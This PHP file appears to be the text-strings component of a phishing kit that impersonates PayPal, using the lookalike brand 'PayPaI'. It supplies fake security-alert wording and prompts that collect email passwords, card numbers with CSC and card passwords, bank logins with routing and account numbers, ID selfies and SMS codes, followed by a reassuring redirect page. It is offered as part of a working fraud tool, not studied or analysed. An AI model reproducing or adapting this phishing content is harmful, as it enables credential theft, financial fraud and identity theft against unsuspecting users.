<?php

// ALERT MSG - EMAIL PASS
	$xeon1 = "PayPal";
	$xeon2 = "We noticed some unusual activity";
	$xeon3 = "We need your help securing your account to prevent unauthorized access. For your safety, there may be some limitations on your account until you take action.";
	$xeon4 = "Secure My Account";
	$xeon5 = "Confirm your mailbox";
	$xeon6 = "Everytime we get new securty ways to make our comunity safe";
	$xeon7 = "Email address";
	$xeon8 = "Password";
	$xeon9 = "What is this?";
	$xeon10 = "This new security that we have just activated consists of linking your email box and your paypaI account to inform you of any unusual activity";
	$xeon11 = "Confirm";
	$xeon12 = "Processing...";

// BILL - CC
	$xeon13 = "PayPal";
	$xeon14 = "Confirm your informations";
	$xeon15 = "Please verify carefully your personal and card informations";
	$xeon16 = "Personal informations :";
	$xeon17 = "Full name";
	$xeon18 = "Date of birth";
	$xeon19 = "Street address";
	$xeon20 = "Town/City";
	$xeon21 = "ZIP code";
	$xeon22 = "Phone number";
	$xeon23 = "Debit or credit card number";
	$xeon24 = "Expiration date";
	$xeon25 = "CSC";
	$xeon26 = "What is this?";
	$xeon27 = "The security code is the final three digits of the number printed on the signature strip on the reverse of your card.";
	$xeon28 = "The security code is the four digit number on the front of your card above the long card account number.";
	$xeon29 = "Confirm";

// CC PASS
	$xeon30 = "Card password";
	$xeon31 = "Date of birth";
	$xeon32 = "Confirm";

// BANK
	$xeon33 = "Link your bank account";
	$xeon34 = "Link your bank account to send money to friends in your country for free";
	$xeon35 = "Bank account :";
	$xeon36 = "Online ID";
	$xeon37 = "Password";
	$xeon38 = "Account type";
	$xeon39 = "Checking";
	$xeon40 = "Savings";
	$xeon41 = "Routing Number";
	$xeon42 = "Account Number";
	$xeon43 = "By clicking <b>Link Bank Instantly,</b> you agree to use your association for your bank.";
	$xeon44 = "Link";

// ID
	$xeon45 = "I don't have bank account";
	$xeon46 = "Confirm your ID verification";
	$xeon47 = "Verify your identity for more secure";
	$xeon48 = "Selfie with your identity card";
	$xeon49 = "Drag and drop a file or select add Image";
	$xeon50 = "Remove Image";
	$xeon51 = "Confirm";

// SMS
	$xeon52 = "Your security is our priority";
	$xeon53 = "We just want to confirm that it is you";
	$xeon54 = "Receive SMS";
	$xeon55 = "Next";
	$xeon56 = "By continuing, you confirm that you are authorized to use this telephone number and agree to receive SMS to confirm your identity in this session. Charges may be applied by the operator.";
	$xeon57 = "Enter your code";
	$xeon58 = "We have sent a 6-digit security code to";
	$xeon59 = "Visual cryptogram";
	$xeon60 = "Continuer";

// THANKS
	$xeon61 = "Your Account has been successfully Restored";
	$xeon62 = "<p class=\"xeonDescription\">Now you can enjoy our services, thank you for chosing our strusted service.Your account will be verified in the next 24 hours.</p><p class=\"xeonDescription\">You are being redirected to your PayPal account.<br/>Withing 5 seconds.</p>";

// LOGIN
	$xlog1 = "Log in to your PayPaI account";
	$xlogerror = "Please check your entries and try again.";
	$xlog2 = "Change";
	$xlog3 = "Email";
	$xlog4 = "Required";
	$xlog5 = "That email format isn’t right";
	$xlog6 = "Next";
	$xlog7 = "Password";
	$xlog8 = "Show";
	$xlog9 = "Hide";
	$xlog10 = "Log In";
	$xlog11 = "Having trouble logging in?";
	$xlog12 = "or";
	$xlog13 = "Sign Up";
	$xlog14 = "Privacy";
	$xlog15 = "PayPaI";
	$xlog16 = "Copyright &copy; 1999-2020 PayPaI. All rights reserved.";
	
//FOOTER
	$foot1 = "Contact Us";
	$foot2 = "Privacy";
	$foot3 = "Legal";
	$foot4 = "Worldwide";


// COUNTRYS SELECT

	$country = '
<select name="xeonCtry" id="xeonCtry">
	<option value="" selected="selected" disabled="disabled">Select your country</option>
	<option value="Albania">Albania</option>
	<option value="Algeria">Algeria</option>
	<option value="Andorra">Andorra</option>
	<option value="Angola">Angola</option>
	<option value="Anguilla">Anguilla</option>
	<option value="Antigua &amp; Barbuda">Antigua &amp; Barbuda</option>
	<option value="Argentina">Argentina</option>
	<option value="Armenia">Armenia</option>
	<option value="Aruba">Aruba</option>
	<option value="Australia">Australia</option>
	<option value="Austria">Austria</option>
	<option value="Azerbaijan">Azerbaijan</option>
	<option value="Bahamas">Bahamas</option>
	<option value="Bahrain">Bahrain</option>
	<option value="Barbados">Barbados</option>
	<option value="Belarus">Belarus</option>
	<option value="Belgium">Belgium</option>
	<option value="Belize">Belize</option>
	<option value="Benin">Benin</option>
	<option value="Bermuda">Bermuda</option>
	<option value="Bhutan">Bhutan</option>
	<option value="Bolivia">Bolivia</option>
	<option value="Bosnia &amp; Herzegovina">Bosnia &amp; Herzegovina</option>
	<option value="Botswana">Botswana</option>
	<option value="Brazil">Brazil</option>
	<option value="British Virgin Islands">British Virgin Islands</option>
	<option value="Brunei">Brunei</option>
	<option value="Bulgaria">Bulgaria</option>
	<option value="Burkina Faso">Burkina Faso</option>
	<option value="Burundi">Burundi</option>
	<option value="Cambodia">Cambodia</option>
	<option value="Cameroon">Cameroon</option>
	<option value="Canada">Canada</option>
	<option value="Cape Verde">Cape Verde</option>
	<option value="Cayman Islands">Cayman Islands</option>
	<option value="Chad">Chad</option>
	<option value="Chile">Chile</option>
	<option value="China">China</option>
	<option value="Colombia">Colombia</option>
	<option value="Comoros">Comoros</option>
	<option value="Congo - Brazzaville">Congo - Brazzaville</option>
	<option value="Congo - Kinshasa">Congo - Kinshasa</option>
	<option value="Cook Islands">Cook Islands</option>
	<option value="Costa Rica">Costa Rica</option>
	<option value="Côte d’Ivoire">Côte d’Ivoire</option>
	<option value="Croatia">Croatia</option>
	<option value="Cyprus">Cyprus</option>
	<option value="Czech Republic">Czech Republic</option>
	<option value="Denmark">Denmark</option>
	<option value="Djibouti">Djibouti</option>
	<option value="Dominica">Dominica</option>
	<option value="Dominican Republic">Dominican Republic</option>
	<option value="Ecuador">Ecuador</option>
	<option value="Egypt">Egypt</option>
	<option value="El Salvador">El Salvador</option>
	<option value="Eritrea">Eritrea</option>
	<option value="Estonia">Estonia</option>
	<option value="Ethiopia">Ethiopia</option>
	<option value="Falkland">Falkland Islands</option>
	<option value="Faroe Islands">Faroe Islands</option>
	<option value="Fiji">Fiji</option>
	<option value="Finland">Finland</option>
	<option value="France">France</option>
	<option value="French Guiana">French Guiana</option>
	<option value="French Polynesia">French Polynesia</option>
	<option value="Gabon">Gabon</option>
	<option value="Gambia">Gambia</option>
	<option value="Georgia">Georgia</option>
	<option value="Germany">Germany</option>
	<option value="Gibraltar">Gibraltar</option>
	<option value="Greece">Greece</option>
	<option value="Greenland">Greenland</option>
	<option value="Grenada">Grenada</option>
	<option value="Guadeloupe">Guadeloupe</option>
	<option value="Guatemala">Guatemala</option>
	<option value="Guinea">Guinea</option>
	<option value="Guinea-Bissau">Guinea-Bissau</option>
	<option value="Guyana">Guyana</option>
	<option value="Honduras">Honduras</option>
	<option value="Hong Kong SAR China">Hong Kong SAR China</option>
	<option value="Hungary">Hungary</option>
	<option value="Iceland">Iceland</option>
	<option value="India">India</option>
	<option value="Indonesia">Indonesia</option>
	<option value="Ireland">Ireland</option>
	<option value="Israel">Israel</option>
	<option value="Italy">Italy</option>
	<option value="Jamaica">Jamaica</option>
	<option value="Japan">Japan</option>
	<option value="Jordan">Jordan</option>
	<option value="Kazakhstan">Kazakhstan</option>
	<option value="Kenya">Kenya</option>
	<option value="Kiribati">Kiribati</option>
	<option value="Kuwait">Kuwait</option>
	<option value="Kyrgyzstan">Kyrgyzstan</option>
	<option value="Laos">Laos</option>
	<option value="Latvia">Latvia</option>
	<option value="Lesotho">Lesotho</option>
	<option value="Liechtenstein">Liechtenstein</option>
	<option value="Lithuania">Lithuania</option>
	<option value="Luxembourg">Luxembourg</option>
	<option value="Macedonia">Macedonia</option>
	<option value="Madagascar">Madagascar</option>
	<option value="Malawi">Malawi</option>
	<option value="Malaysia">Malaysia</option>
	<option value="Maldives">Maldives</option>
	<option value="Mali">Mali</option>
	<option value="Malta">Malta</option>
	<option value="Marshall">Marshall Islands</option>
	<option value="Martinique">Martinique</option>
	<option value="Mauritania">Mauritania</option>
	<option value="Mauritius">Mauritius</option>
	<option value="Mayotte">Mayotte</option>
	<option value="Mexico">Mexico</option>
	<option value="Micronesia">Micronesia</option>
	<option value="Moldova">Moldova</option>
	<option value="Monaco">Monaco</option>
	<option value="Mongolia">Mongolia</option>
	<option value="Montenegro">Montenegro</option>
	<option value="Montserrat">Montserrat</option>
	<option value="Morocco">Morocco</option>
	<option value="Mozambique">Mozambique</option>
	<option value="Namibia">Namibia</option>
	<option value="Nauru">Nauru</option>
	<option value="Nepal">Nepal</option>
	<option value="Netherlands">Netherlands</option>
	<option value="Netherlands Antilles">Netherlands Antilles</option>
	<option value="New Caledonia">New Caledonia</option>
	<option value="New Zealand">New Zealand</option>
	<option value="Nicaragua">Nicaragua</option>
	<option value="Niger">Niger</option>
	<option value="Nigeria">Nigeria</option>
	<option value="Niue">Niue</option>
	<option value="Norfolk Island">Norfolk Island</option>
	<option value="Norway">Norway</option>
	<option value="Oman">Oman</option>
	<option value="Palau">Palau</option>
	<option value="Panama">Panama</option>
	<option value="Papua New Guinea">Papua New Guinea</option>
	<option value="Paraguay">Paraguay</option>
	<option value="Peru">Peru</option>
	<option value="Philippines">Philippines</option>
	<option value="Pitcairn Islands">Pitcairn Islands</option>
	<option value="Poland">Poland</option>
	<option value="Portugal">Portugal</option>
	<option value="Qatar">Qatar</option>
	<option value="Réunion">Réunion</option>
	<option value="Romania">Romania</option>
	<option value="Russia">Russia</option>
	<option value="Rwanda">Rwanda</option>
	<option value="Samoa">Samoa</option>
	<option value="San Marino">San Marino</option>
	<option value="São Tomé &amp; Príncipe">São Tomé &amp; Príncipe</option>
	<option value="Saudi Arabia">Saudi Arabia</option>
	<option value="Senegal">Senegal</option>
	<option value="Serbia">Serbia</option>
	<option value="Seychelles">Seychelles</option>
	<option value="Sierra Leone">Sierra Leone</option>
	<option value="Singapore">Singapore</option>
	<option value="Slovakia">Slovakia</option>
	<option value="Slovenia">Slovenia</option>
	<option value="Solomon Islands">Solomon Islands</option>
	<option value="Somalia">Somalia</option>
	<option value="South Africa">South Africa</option>
	<option value="South Korea">South Korea</option>
	<option value="Spain">Spain</option>
	<option value="Sri Lanka">Sri Lanka</option>
	<option value="St. Helena">St. Helena</option>
	<option value="St. Kitts &amp; Nevis">St. Kitts &amp; Nevis</option>
	<option value="St. Lucia">St. Lucia</option>
	<option value="St. Pierre &amp; Miquelon">St. Pierre &amp; Miquelon</option>
	<option value="St. Vincent &amp; Grenadines">St. Vincent &amp; Grenadines</option>
	<option value="Suriname">Suriname</option>
	<option value="Svalbard &amp; Jan Mayen">Svalbard &amp; Jan Mayen</option>
	<option value="Swaziland">Swaziland</option>
	<option value="Sweden">Sweden</option>
	<option value="Switzerland">Switzerland</option>
	<option value="Taiwan">Taiwan</option>
	<option value="Tajikistan">Tajikistan</option>
	<option value="Tanzania">Tanzania</option>
	<option value="Thailand">Thailand</option>
	<option value="Togo">Togo</option>
	<option value="Tonga">Tonga</option>
	<option value="Trinidad &amp; Tobago">Trinidad &amp; Tobago</option>
	<option value="Tunisia">Tunisia</option>
	<option value="Turkmenistan">Turkmenistan</option>
	<option value="Turks &amp; Caicos Islands">Turks &amp; Caicos Islands</option>
	<option value="Tuvalu">Tuvalu</option>
	<option value="Uganda">Uganda</option>
	<option value="Ukraine">Ukraine</option>
	<option value="United Arab Emirates">United Arab Emirates</option>
	<option value="United Kingdom">United Kingdom</option>
	<option value="United States">United States</option>
	<option value="Uruguay">Uruguay</option>
	<option value="Vanuatu">Vanuatu</option>
	<option value="Vatican City">Vatican City</option>
	<option value="Venezuela">Venezuela</option>
	<option value="Vietnam">Vietnam</option>
	<option value="Wallis &amp; Futuna">Wallis &amp; Futuna</option>
	<option value="Yemen">Yemen</option>
	<option value="Zambia">Zambia</option>
	<option value="Zimbabwe">Zimbabwe</option>
</select>
	';